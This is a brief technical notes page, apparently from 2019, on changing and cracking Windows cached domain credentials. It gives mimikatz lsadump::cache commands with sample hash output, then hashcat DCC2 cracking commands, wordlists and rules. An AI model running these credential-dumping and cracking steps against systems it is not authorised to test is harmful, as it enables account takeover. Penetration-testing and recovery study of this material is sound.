Cached domain credentials can be modified with mimikatz's /kiwi switch1:
mimikatz #privilege::debugmimikatz #token::elevatemimikatz #lsadump::cache /user:user-to-modify /password:new-password /kiwi
While logging in via the reset password works, data secured by DPAPI (Data Protection API) is inaccessible after the change.2,3 Programs that leverage DPAPI include: EFS, Microsoft Outlook, Windows Live Mail, and Google Chrome, among others (though notably not Mozilla Firefox).4,5
Rather than replacing domain cached credentials, decrypting them may be possible:
mimikatz #privilege::debugmimikatz #token::elevatemimikatz #lsadump::cache... * Iteration is set to default (10240) ... [NL$1 - 2/23/2013 4:48:29 PM] RID : 0000045a (1114) User : MYDOMAIN\jsmith MsCacheV2 : e4e4e18ac7d15990f64ebe1be1989d9f
$DCC2$10240#jsmith#e4e4e18ac7d15990f64ebe1be1989d9f
$git clone https://github.com/hashcat/hashcat.git$cd hashcat/$make
$ hashcat -a 0 -m 2100 --status -o found.txt hash.txt rocktastic.txt
-a 0 = set attack mode to straight / dictionary attack
-m 2100 = set hash mode to "Domain Cached Credentials 2 (DCC2), MS Cache 2"
--status = automatically update status screen
-o found.txt = output recovered password to found.txt
hash.txt = the hash we saved in step 2.1.1
rocktastic.txt = Rocktastic: "a word list on steroids"7
Status...........: Cracked Hash.Type........: Domain Cached Credentials 2 (DCC2), MS Cache 2 Hash.Target......: $DCC2$10240#jsmith#e4e4e18ac7d15990f64ebe1be1989d9f ... Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
"Utilities exist that can help overwrite the cached verifier. By using one of these utilities, an attacker can authenticate by using the overwritten value. ... Overwriting the password does not help an attacker replace the verifier, because the base keying material is incorrect. Therefore, data that is encrypted by using Encrypting File System or by using the Data Protection API (DPAPI) will not decrypt." —Cached credentials security in Windows Server 2003, in Windows XP, and in Windows 2000
"Even though someone overrides Cached Logon Data, this person is not able to get access to our data protection API protected data." —Cached Credentials: Important Facts That You Cannot Miss
"On Windows, Chrome encrypts the passwords with Windows DPAPI, which can be decrypted by any program running as the Windows user, unless the user's logon password is forcibly reset." —Comment by Ben N on Information Security
"Chrome and IE use DPAPI for secrets, Firefox just uses a plaintext master key file since Mozilla is too cool for Windows." —Tweet by SwiftOnSecurity
For better cracking performance, pair your wordlist with a high-quality basic rules file. Release the Kraken: Starting Your Password Cracking Journey suggests append_d.rule (adds numbers to the end of a password), append_s.rule (adds special characters to the end of a password), and leetspeak.rule (changes passwords to leetspeak).
See also breachcompilation.txt and Weakpass 2.0
Dumping Windows Credentials: "Cached Domain Credentials. These are the password hashes of domain users that have logged on to the host previously. Crack them using JtR or hashcat. Remember to specify the right format, which is either mscash (xp, w2k3) or mscash2 (vista, w7, w2k8 …). Note that you can’t perform 'pass-the-hash' style attacks with this type of hash."
MSCash2 Algorithm (includes sample code for generating v2 Domain Cached Credentials): "Domain cached credentials (DCC) are cached domain logon information that are stored locally in the Windows registry of Windows operating systems (cf. MSCash Algorithm). With the release of the Windows Vista operating system, Microsoft introduced a new hash algorithm for generating these Domain Cached Credentials. This new algorithm increased the cost of password guessing attacks by several orders of magnitude."
Passcape's Reset Windows Password can reset or change domain cached passwords and its Network Password Recovery Wizard may recover domain cached passwords.
created: 2019.01.29, updated: 2019.02.05